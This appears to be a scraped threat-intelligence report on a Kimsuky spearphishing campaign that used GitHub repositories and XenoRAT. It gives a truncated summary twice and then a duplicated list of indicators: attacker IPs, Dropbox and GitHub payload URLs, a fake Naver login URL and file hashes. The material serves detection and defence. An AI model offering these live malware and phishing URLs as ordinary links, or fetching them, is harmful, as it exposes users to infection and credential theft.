Dissecting Kimsuky's Attacks on South Korea: In-Depth Analysis of GitHub-Based Malicious Infrastructure
Contents
Threat Intelligence
EnkiWhiteHat
2025. 6. 19.
Executive Summary
A sophisticated spearphishing attack was detected in which Github was used as attack infrastructure to distribute malware.
The malware accesses the attackerâs private repositories using a hardcoded Github Personal Access Token (PAT).
Log files stored in the private repository revealed an IP address used by the attacker for testing purposes.
Analysis of the XenoRAT C&C indicated links to the North Korean threat group Kimsuky.
1. Overview
During analysis of malicious powershell script posted on X, a Github account that had been leveraged for attacks since March 2025 was discovered.
The malware contained a valid Github Personal Access Token (PAT) hardcoded by the attacker. We confirmed that this token was used to download malware from a private repository and upload information collected from victim systems.
The files present in the repository were identified as malware, decoy files, and information from infected systems, demonstrating that the attacker abused Github as attack infrastructure.
This report details the …
EnkiWhiteHat
2025. 6. 19.
Executive Summary
A sophisticated spearphishing attack was detected in which Github was used as attack infrastructure to distribute malware.
The malware accesses the attackerâs private repositories using a hardcoded Github Personal Access Token (PAT).
Log files stored in the private repository revealed an IP address used by the attacker for testing purposes.
Analysis of the XenoRAT C&C indicated links to the North Korean threat group Kimsuky.
1. Overview
During analysis of malicious powershell script posted on X, a Github account that had been leveraged for attacks since March 2025 was discovered.
The malware contained a valid Github Personal Access Token (PAT) hardcoded by the attacker. We confirmed that this token was used to download malware from a private repository and upload information collected from victim systems.
The files present in the repository were identified as malware, decoy files, and information from infected systems, demonstrating that the attacker abused Github as attack infrastructure.
This report details the …
IoC
https://dl.dropboxusercontent.com/scl/fi/hpv3jd8o9annkala8vskb/hhopp.rtf?rlkey=nmwknu8l1ormxcmvo77ehhwr8&st=y99kquph&dl=0
http://80.71.157.55
https://dl.dropboxusercontent.com/scl/fi/3z2lxx1aor5g82e86c6ru/panel.rtf?rlkey=zaafvohxvwgvnfv383oe1vmt5&st=umtc7teu&dl=0
http://10.7.185.68
https://dl.dropboxusercontent.com/scl/fi/bifls0sn1nx1b52adydyn/tt7024.rtf?rlkey=le9xhv7v9clh9sof5787wl3da&st=rz6k0vgl&dl=0
https://dl.dropboxusercontent.com/scl/fi/okglg167i8kuwna1m2lxm/bie70er.rtf?rlkey=473ofwk5bcqsehgyw4dxs2ibv&st=ecned2g2&dl=0
http://158.247.202.109
http://101.36.114.190
http://165.154.78.9:443
https://raw.githubusercontent.com/luckmask/asp/main/xxx.rtf
http://165.154.78.9
http://192.168.35.35
https://dl.dropboxusercontent.com/scl/fi/ti6rphsns0xsvx1ekb02f/bie70er.rtf?rlkey=ug5wa6p2tzyq9rukv51dx4ity&st=hpuv2uwd&dl=0
http://10.33.77.174
https://nid
http://158.247.230.196
http://141.164.41.17
http://216.244.74.115
http://118.194.249.201
https://dl.dropboxusercontent.com/scl/fi/c6ba7iwuke57d75j3mmte/eula.rtf$dropboxBaseUrl?rlkey=t0jnirhxk48xdu8p74rqgv9dw&st=oofgjsq8&dl=0
http://216.244.74.115:80
https://dl.dropboxusercontent.com/scl/fi/67j5162v19rtngxkexau5/bie70er.rtf?rlkey=2kdy91rrcugaueif7aucd8b0d&st=mflxxjq7&dl=0
http://139.99.36.158
http://45.61.161.103
https://dl.dropboxusercontent.com/scl/fi/nanwt6elsuxziz05hnlt4/cjfansgmlans1-x.txt?rlkey=l6gzro1rswkqbk6tinxnkuylv&st=iv78c1cg&dl=0
https://raw.githubusercontent.com/Dasi274/star/main/xxx.rtf
https://dl.dropboxusercontent.com/scl/fi/bqicute746gcts2utf903/pong_race.rtf?rlkey=53r0g9f69khan7zkgzkc9ox90&st=nry1hb3s&dl=0
https://dl.dropboxusercontent.com/scl/fi/c6ba7iwuke57d75j3mmte/eula.rtf?rlkey=t0jnirhxk48xd8p74rqgv9dw&st=oofgjsq8&dl=0
http://158.247.202.109/invoice/?wreply=&m=https%3a%2f%2fnid.naver[.]com%2fnidlogin[.]login%3furl%3dhttp%253a%252f%252fmail.naver[.]com%252f
http://158.247.230.196:443
http://158.247.253.215
192.168.35.35
158.247.230.196
216.244.74.115
45.61.161.103
118.194.249.201
101.36.114.190
10.7.185.68
165.154.78.9
139.99.36.158
158.247.202.109
80.71.157.55
10.33.77.174
158.247.253.215
141.164.41.17
[email protected]
[email protected]
b36159563452d9a837a5e566ad2a1e44
a56edfef94008c77abfb4e151df934d9
57015267d06b0d80721015ccd29a04cd
5e9a80d3d4f71ecd8bf8e579a5e2449c
1dee4c60fffcc80eb4bbd523eedab2f4
157d1b1798f0f370a95125253e039c18
baf164d2a5066cab5772dc6ae4807f43
8c84d7f559cf0947fbf1981a0acb8a35
85f5075610661c9706571a33548d7585
a87659641e00d724de5662b14fe142e8
af999c3c615b56691d75e8c877e185fb
f692c1dd797f68c34744a377482c4ed4
7df07ecb0b516df085a5ee95ed8e6560
b77e4e9f5897f00dcbd08b2ee9bde7e8
976ad041832082f2d304df12b61457cb
b13ffe7b8e351291250f1a3a855134aa
b99c1d9bf70be5172a8b36b098c67ee5
522a122f3cd4c488a51d81c846bfabbb
acd2d728ee4d1110521524c1eac6204e
f51a2ccb4b9b2bf163c81b525bfac08e
a9d80e7fe3f217ea4d33f8a4a0f3f73c
6cbc007799b56682ac196e44d79e496d
d0a8cd7584547bdb2959f0d1008e6871
5be0527f5c84208371761cee852f0d7c
c2f88038d431bb190454fae02225e639
0cb6e67f23ccebc3727f755be5140497
1808bd4919c5943096a4a19784d6b8de
5076c579e378f976a57e862e5b6a7859
10ce9409d8d1e72ea6439bec7cd7e4cd
74b1d5f857a4245aef8189ac4f409a99
30d5f17d5e3f85be18220a7cab0b9fff
45ed6abfc12be606bdbcfe76bd17b2af
8c561a53085651d7f47b24129c2cd2d0
http://80.71.157.55
https://dl.dropboxusercontent.com/scl/fi/3z2lxx1aor5g82e86c6ru/panel.rtf?rlkey=zaafvohxvwgvnfv383oe1vmt5&st=umtc7teu&dl=0
http://10.7.185.68
https://dl.dropboxusercontent.com/scl/fi/bifls0sn1nx1b52adydyn/tt7024.rtf?rlkey=le9xhv7v9clh9sof5787wl3da&st=rz6k0vgl&dl=0
https://dl.dropboxusercontent.com/scl/fi/okglg167i8kuwna1m2lxm/bie70er.rtf?rlkey=473ofwk5bcqsehgyw4dxs2ibv&st=ecned2g2&dl=0
http://158.247.202.109
http://101.36.114.190
http://165.154.78.9:443
https://raw.githubusercontent.com/luckmask/asp/main/xxx.rtf
http://165.154.78.9
http://192.168.35.35
https://dl.dropboxusercontent.com/scl/fi/ti6rphsns0xsvx1ekb02f/bie70er.rtf?rlkey=ug5wa6p2tzyq9rukv51dx4ity&st=hpuv2uwd&dl=0
http://10.33.77.174
https://nid
http://158.247.230.196
http://141.164.41.17
http://216.244.74.115
http://118.194.249.201
https://dl.dropboxusercontent.com/scl/fi/c6ba7iwuke57d75j3mmte/eula.rtf$dropboxBaseUrl?rlkey=t0jnirhxk48xdu8p74rqgv9dw&st=oofgjsq8&dl=0
http://216.244.74.115:80
https://dl.dropboxusercontent.com/scl/fi/67j5162v19rtngxkexau5/bie70er.rtf?rlkey=2kdy91rrcugaueif7aucd8b0d&st=mflxxjq7&dl=0
http://139.99.36.158
http://45.61.161.103
https://dl.dropboxusercontent.com/scl/fi/nanwt6elsuxziz05hnlt4/cjfansgmlans1-x.txt?rlkey=l6gzro1rswkqbk6tinxnkuylv&st=iv78c1cg&dl=0
https://raw.githubusercontent.com/Dasi274/star/main/xxx.rtf
https://dl.dropboxusercontent.com/scl/fi/bqicute746gcts2utf903/pong_race.rtf?rlkey=53r0g9f69khan7zkgzkc9ox90&st=nry1hb3s&dl=0
https://dl.dropboxusercontent.com/scl/fi/c6ba7iwuke57d75j3mmte/eula.rtf?rlkey=t0jnirhxk48xd8p74rqgv9dw&st=oofgjsq8&dl=0
http://158.247.202.109/invoice/?wreply=&m=https%3a%2f%2fnid.naver[.]com%2fnidlogin[.]login%3furl%3dhttp%253a%252f%252fmail.naver[.]com%252f
http://158.247.230.196:443
http://158.247.253.215
192.168.35.35
158.247.230.196
216.244.74.115
45.61.161.103
118.194.249.201
101.36.114.190
10.7.185.68
165.154.78.9
139.99.36.158
158.247.202.109
80.71.157.55
10.33.77.174
158.247.253.215
141.164.41.17
[email protected]
[email protected]
b36159563452d9a837a5e566ad2a1e44
a56edfef94008c77abfb4e151df934d9
57015267d06b0d80721015ccd29a04cd
5e9a80d3d4f71ecd8bf8e579a5e2449c
1dee4c60fffcc80eb4bbd523eedab2f4
157d1b1798f0f370a95125253e039c18
baf164d2a5066cab5772dc6ae4807f43
8c84d7f559cf0947fbf1981a0acb8a35
85f5075610661c9706571a33548d7585
a87659641e00d724de5662b14fe142e8
af999c3c615b56691d75e8c877e185fb
f692c1dd797f68c34744a377482c4ed4
7df07ecb0b516df085a5ee95ed8e6560
b77e4e9f5897f00dcbd08b2ee9bde7e8
976ad041832082f2d304df12b61457cb
b13ffe7b8e351291250f1a3a855134aa
b99c1d9bf70be5172a8b36b098c67ee5
522a122f3cd4c488a51d81c846bfabbb
acd2d728ee4d1110521524c1eac6204e
f51a2ccb4b9b2bf163c81b525bfac08e
a9d80e7fe3f217ea4d33f8a4a0f3f73c
6cbc007799b56682ac196e44d79e496d
d0a8cd7584547bdb2959f0d1008e6871
5be0527f5c84208371761cee852f0d7c
c2f88038d431bb190454fae02225e639
0cb6e67f23ccebc3727f755be5140497
1808bd4919c5943096a4a19784d6b8de
5076c579e378f976a57e862e5b6a7859
10ce9409d8d1e72ea6439bec7cd7e4cd
74b1d5f857a4245aef8189ac4f409a99
30d5f17d5e3f85be18220a7cab0b9fff
45ed6abfc12be606bdbcfe76bd17b2af
8c561a53085651d7f47b24129c2cd2d0